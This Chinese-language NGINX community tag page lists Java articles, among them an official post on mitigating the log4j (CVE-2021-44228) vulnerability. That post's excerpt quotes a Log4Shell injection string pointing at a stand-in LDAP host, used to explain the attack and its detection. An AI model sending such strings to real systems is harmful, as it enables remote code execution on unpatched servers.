We're sorry but nginx-community doesn't work properly without JavaScript enabled. Please enable it to continue.
开源社区
首页
文章
问答
文档
软件下载
发现更多
三方插件
技术支持
电子书
公开课
社区贡献榜
关于我们
登录
注册
# java
Java是一门面向对象的编程语言,不仅吸收了C++语言的各种优点,还摒弃了C++里难以理解的多继承、指针等概念,因此Java语言具有功能强大和简单易用两个特征,以及简单性、面向对象、分布式、健壮性、安全性、平台独立与可移植性、多线程、动态性等多个特点。
关注标签
1人关注
文章
问答
排序
热门
最新
NGINX官方账号
发布于2021-12-27 11:00
NGINX 助力缓解 log4j 漏洞 (CVE-2021-44228)
中发现了一个非常严重的Log4Shell是什么?2.16修复了该漏洞。)Log4Shell是指针对该漏洞的攻击行为。但是,这一漏洞是什么呢?为何它如此重要?如CVE中所述,Apachelog4jJava库未能正确地对输入进行验证。log4j库与Java运行时包含的Java命名和目录接口(JNDI)这一特性可用于执行远程查找,这样就可以从外部数据源获取数据(例如从LDAP获取用户名或从DNS获取IP地址),然后再将其加入某个日志条目中。然而,远程攻击者会趁机劫持JNDI来执行其编写的Java代码。下图形象地展示了攻击过程。${jndi:ldap://evil.xa/x} 和完全不会。NGINX本身不会受到这一漏洞攻击的影响,因为它采用C语言编写而成,没有使用Java或任何基于Java的库。有关所有F5和NGINX的产品针对 如上所述,攻击者必须将用于攻击的字符串插在HTTP请求中某个位置,并发送给目标应用。NGINX提供了多种用于扫描入向请求的工具,以便识别入侵迹象(IOC)
点赞
6
浏览
2.6k
NGINX官方账号
发布于2022-04-12 10:43
借助 NGINX Unit 在零信任环境中运行 Spring Boot 应用
原文作者:TimoStarkofF5原文链接:借助NGINXUnit在零信任环境中运行SpringBoot应用-NGINX转载来源:NGINX官方网站(首次发布于2021.8.18) 近来,好像人人都在讨论“安全性”。保护应用安全历来挑战重重,上云之后更是难上加难。而一种看起来比较靠谱的解决方案是“零信任”。Gartner 将“零信任”定义为: ……一种在所有计算基础架构中消除绝对信任的方法,“零信任”意味着会有意地且持续地计算和调整信任级别,使得“适时、适度地访问企业资源”得以实现。但“零信任”究竟是如何在云环境中工作的,有哪些技术可以帮助您实现“零信任”?本文将在一个常见用例的背景下介绍零信任:假设您是一家拥有各种由Java提供支持的API和服务的保险公司。现在您已迁移到云端,生产级工作负载由CI/CD流水线自动构建,并部署在公有云服务提供商的Kubernetes集群中。在处理敏感的客户信息时,一个主要要求就是使用TLS加密所有的流量。您已在边缘负载均衡器和IngressContr
点赞
0
浏览
1.6k
头发尚在
发布于2023-11-09 19:35
使用IO流复制文件
对文件的复制也是我们工作当中经常会遇到的操作,那么哪种方式效率更快呢,今天来做个测试。头脑风暴首先能想到的就是,采用两个数据流:一个用于读取、一个用于写入;IO流我们可以采用字节流或字符流,但是字符流
点赞
0
浏览
493
发表文章
提问
社区达人
成为达人
相关文章
保持联系
微信公众号
加入微信群
获取商业支持
了解商业产品和专业支持服务
加入邮件列表
向开发组提交代码或反馈意见